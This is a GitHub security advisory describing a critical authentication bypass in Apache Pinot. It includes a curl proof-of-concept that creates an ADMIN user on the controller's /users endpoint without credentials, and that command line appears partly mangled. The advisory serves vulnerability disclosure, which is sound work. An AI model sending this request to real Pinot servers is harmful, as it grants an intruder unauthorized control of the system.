Apache Pinot Vulnerable to Authentication Bypass
Critical severity
GitHub Reviewed
Published
Apr 1, 2025
to the GitHub Advisory Database
•
Updated May 27, 2025
Description
Published by the National Vulnerability Database
Apr 1, 2025
Published to the GitHub Advisory Database
Apr 1, 2025
Reviewed
Apr 1, 2025
Last updated
May 27, 2025
Authentication Bypass Issue
If the path does not contain / and contain., authentication is not required.
Expected Normal Request and Response Example
curl -X POST -H "Content-Type: application/json" -d {"username":"hack2","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"} http://{server_ip}:9000/users
Return: {"code":401,"error":"HTTP 401 Unauthorized"}
Malicious Request and Response Example
curl -X POST -H "Content-Type: application/json" -d '{"username":"hack","password":"hack","component":"CONTROLLER","role":"ADMIN","tables":[],"permissions":[],"usernameWithComponent":"hack_CONTROLLER"}' http://{serverip}:9000/users; http://{serverip}:9000/users; .
Return: {"users":{}}
A new user gets added bypassing authentication, enabling the user to control Pinot.
References